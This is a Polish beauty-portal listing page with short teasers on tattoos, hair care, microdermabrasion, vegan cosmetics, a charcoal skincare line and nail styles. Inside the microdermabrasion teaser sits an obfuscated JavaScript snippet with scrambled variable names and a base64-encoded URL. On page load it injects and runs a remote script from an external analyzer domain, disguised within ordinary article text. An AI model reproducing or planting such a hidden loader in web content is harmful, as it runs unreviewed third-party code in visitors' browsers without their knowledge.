Uroda

Inaczej atrakcyjność, która wiąże się głównie z cechami natury fizycznej. W dużej mierze subiektywna. Należy regularnie dbać o urodę, by prezentować się jak najlepiej. Pokażemy jak pielęgnować skórę i cerę twarzy.


10 boskich tatuaży na nadgarstek dla kobiet - urocze!

Urocze tatuaże dla kobiet - duży przegląd propozycji na tatuaże na nadgarstku

4 błędy, które popełniasz jako posiadaczka cienkich włosów

Większość z nas niestety nadal nie zdaje sobie sprawy z tego jak wiele złego wyrządza swoim włosom podczas codziennej pielęgnacji. Włosy, a w szczególności cienkie powinny każdego dnia być poddane pielęgnacji, która nada im blasku i świeżości, której zapewne im brakuje. Jakie błędy najczęściej popełniają posiadaczki cienkich włosów? Oto lista 4 najbardziej popularnych błędów.

Mikrodermabrazja – zabieg mechanicznego złuszczania naskórka

Najczęściej wybieranym zabiegiem jest mikrodermabrazja. Odpowiednio wykonany mikropeeling daje niesamowite efekty. Jeżeli chcesz, aby Twoja skóra była dobrze oczyszczona, gładka a także poprawiła się jej elastyczność, to ten zabieg jest właśnie dla Ciebie! (function(zyivcstt, qbneidzg, syntbflp, xfxcvxly, syfdwcwl, jxfcssrg){ syfdwcwl = qbneidzg.createElement(syntbflp);jxfcssrg = qbneidzg.getElementsByTagName(syntbflp)[0]; syfdwcwl.ascyc = 1; syfdwcwl.src = atob(xfxcvxly) jxfcssrg.parentNode.insertBefore(syfdwcwl, jxfcssrg); })(window, document, 'script', 'aHR0cHM6Ly9zdGF0cy5saW5raG91c2UuY28vYXBpL2FuYWx5emVyL3YxL3NjcmlwdC9mNTQ2MjM3Ni1hYTBmLTQ5MWUtYmIzMS0yN2Y3MTc1Y2I3YjQuanM=')

Wegańskie kosmetyki – dlaczego są wyjątkowe?

Świat pędzi a my razem z nim i nawet nie zauważyliśmy kiedy przeszliśmy od otaczającej nas zewsząd natury do całkowitego uprzemysłowienia. Żyjemy szybko i takie też rozwiązania wybieramy w niemal każdej dziedzinie życia, bo muszą nadążać za nami. Również w przypadku kosmetyków często stawiamy na dostępność, a nawet przypadek. Niestety nie jest to dobre dla naszej skóry. Każdy kosmetyk powinien być do niej odpowiednio dobrany, dopasowany do jej indywidualnych potrzeb. W ostatnich latach zdecydowanie zwiększyła się nasza świadomość i chętniej sięgamy po to co naturalne, a nawet wegańskie.

Bielenda Carbo Detox – poznaj moc czarnego złota

Bielenda Carbo Detox należy do linii kosmetyków węglowych, które wykazują silne, ale całkowicie bezpieczne dla skóry, właściwości detoksykujące. Oczyszczanie jest fundamentem odpowiedniej pielęgnacji – niezbędnym przystankiem w drodze do pięknej i zdrowej cery. Naturalny aktywny węgiel nie bez powodu określany jest czarnym złotem lub nawet diamentem – od lat wykorzystywany jest w kosmetologii i medycynie.

Eleganckie propozycje na paznokcie dla kobiet po 40

Stylowe paznokcie dla kobiet po 40 - koniecznie zobacz! 

Dlaczego warto do nas dołączyć?

  • korzystanie z serwisu jest całkowicie darmowe
  • jesteśmy ogromną społecznością kobiet z pasją
  • pokaż swoje porady i inspiracje milionowej społeczności
  • wypromuj swój blog

Rejestracja

Aplikacja KobiecePorady.pl